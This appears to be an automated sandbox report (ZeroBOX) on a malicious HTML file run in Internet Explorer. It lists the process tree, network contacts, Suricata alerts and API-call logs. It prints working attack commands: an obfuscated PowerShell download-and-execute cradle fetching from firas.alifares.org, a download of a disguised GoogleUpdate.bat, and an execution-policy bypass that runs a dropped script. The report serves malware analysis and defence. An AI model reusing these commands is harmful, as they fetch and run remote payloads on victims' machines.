Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 29, 2021, 9:24 a.m.	April 29, 2021, 9:26 a.m.

Size	150.7KB
Type	HTML document, ASCII text
MD5	`a5b6964b3df390bbc68275fae8aacf51`
SHA256	`65a831cd10ae89661e52999a90614c1d81f7ed3697e9cfaea44aa0712b7d37b1`
CRC32	`C3698D28`
ssdeep	`3072:aKfI9TLORW5XhpzLmH6D3e37W3jpke7xdCXD1C1aPJcLJKZLUa:axFORWphBm22W1keFYpC2cdKt/`
Yara	None matched

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\4.html
5292
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:5292 CREDAT:145409
  3532
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://firas.alifares.org/jihad/3.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
    1160
    - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\ss.vbs"
      2572
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\11.ps1
        7000
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
      3468

Name	Response	Post-Analysis Lookup
firas.alifares.org	A 69.10.38.126	69.10.38.126

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
69.10.38.126	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 69.10.38.126:80 -> 192.168.56.102:49817	2026994	ET INFO PowerShell DownloadFile Command Common In Powershell Stagers	A Network Trojan was detected
TCP 69.10.38.126:80 -> 192.168.56.102:49819	2026994	ET INFO PowerShell DownloadFile Command Common In Powershell Stagers	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 29, 2021, 9:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 29, 2021, 9:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 29, 2021, 9:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 29, 2021, 9:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 29, 2021, 9:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 29, 2021, 9:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 29, 2021, 9:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 29, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 29, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 29, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 29, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 29, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 29, 2021, 9:26 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 29, 2021, 9:24 a.m.			0	0
IsDebuggerPresent April 29, 2021, 9:26 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 82 events)

Time & API	Arguments	Status	Return
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004db6c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a8b90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a8b90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a8b90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a8b90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a8b90 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a83b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a83b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a83b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a83b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5c98f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5c98f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5c98f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a85e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a85e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a85e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a8dc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a8dc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a8dc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a8dc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a8dc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a8dc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a8dc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a8dc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a85e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a85e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a85e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a8c00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5a8c00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5c96c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5c96c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5c9c00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5c9c00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5c9c00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5c9ff0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5c9ff0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5c9ff0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5c9ff0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5e04f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5e04f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004db8f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000004db8f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000001f03a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000277ca0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000277ca0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000277ca0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8e0790 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8e0790 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8e0870 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 29, 2021, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b8e0870 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 29, 2021, 9:24 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://firas.alifares.org/jihad/3.txt
suspicious_features	GET method with no useragent header	suspicious_request	GET http://firas.alifares.org/defender/11.txt
suspicious_features	GET method with no useragent header	suspicious_request	GET http://firas.alifares.org/defender/ss.vbs

Performs some HTTP requests (3 events)

request	GET http://firas.alifares.org/jihad/3.txt
request	GET http://firas.alifares.org/defender/11.txt
request	GET http://firas.alifares.org/defender/ss.vbs

Allocates read-write-execute memory (usually to unpack itself) (50 out of 481 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 region_size: 2625536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002b50000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002dd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000770dd000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077102000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000770e4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077102000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc135000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc135000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdda4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefda01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000770ca000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000032b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000735bc000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002dd0000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000770dd000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077102000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000770e4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077102000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc135000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefdda4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefda01000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000770ca000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077102000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 5292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 3532 region_size: 921600 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000e90000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 3532 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000f70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077131000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000770dd000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 29, 2021, 9:17 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077102000 process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\Public\ss.vbs
file	C:\Users\Public\11.ps1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (5 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
cmdline	powershell -ExecutionPolicy Bypass -File C:\Users\Public\11.ps1
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://firas.alifares.org/jihad/3.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')\|I`E`X
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\11.ps1
cmdline	Powershell $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://firas.alifares.org/jihad/3.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')\|I`E`X

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
